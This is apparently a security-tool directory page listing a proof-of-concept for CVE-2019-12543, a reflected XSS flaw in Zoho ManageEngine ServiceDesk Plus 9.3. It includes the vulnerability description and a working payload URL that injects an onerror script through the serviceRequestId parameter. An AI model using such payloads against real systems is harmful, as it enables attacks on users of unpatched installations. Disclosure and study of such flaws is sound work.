Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2019-12543 — Proof-of-concept XSS exploit for Zoho ManageEngine ServiceDesk Plus 9.3 via the PurchaseRequest.do serviceRequestId parameter, demonstrating reflected cross-site scripting vulnerability. | Kitploit
Tools/GitHubGitHub/tarantula-team/cve-2019-12543
Vulnerability AnalysisWeb Application ExploitationInformation GatheringWeb SecurityPenetration Testing
GitHubtarantula-team/cve-2019-12543

CVE-2019-12543

Proof-of-concept XSS exploit for Zoho ManageEngine ServiceDesk Plus 9.3 via the PurchaseRequest.do serviceRequestId parameter, demonstrating reflected cross-site scripting vulnerability.

View Repository
26 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2019-12543 Zoho ManageEngine ServiceDesk Plus 9.3 XSS vulnerability in PurchaseRequest.do

Information Description: An issue was discovered in Zoho ManageEngine ServiceDesk Plus 9.3. There is XSS via the PurchaseRequest.do serviceRequestId parameter.

Author: Concobe of Tarantula Team - VinCSS (a member of Vingroup)

Payload

domain/PurchaseRequest.do?operation=getAssociatedPrsForSR&serviceRequestId=1%3Cimg%20src%3da%20onerror%3dalert(%27XSS%27)%3E1

Download Tool